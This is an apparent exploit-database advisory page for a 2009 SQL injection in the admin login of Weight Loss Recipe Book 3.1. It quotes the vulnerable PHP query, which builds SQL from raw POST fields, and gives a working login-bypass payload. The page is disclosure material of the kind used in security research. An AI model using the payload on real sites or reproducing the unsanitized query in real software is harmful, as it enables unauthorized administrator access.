header-logo
Suggest Exploit
vendor:
Weight Loss Recipe Book
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Weight Loss Recipe Book
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Weight Loss Recipe Book 3.1

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'administrators_username' and 'administrators_pass' parameters of the 'admin-login.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the administrator's account.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Emails: x0r@live.it \ andry2000@hotmail.it
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In \wlrb_files\admin-login.php

SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1

##############################

Greetz: EdGaR :P

# milw0rm.com [2009-01-11]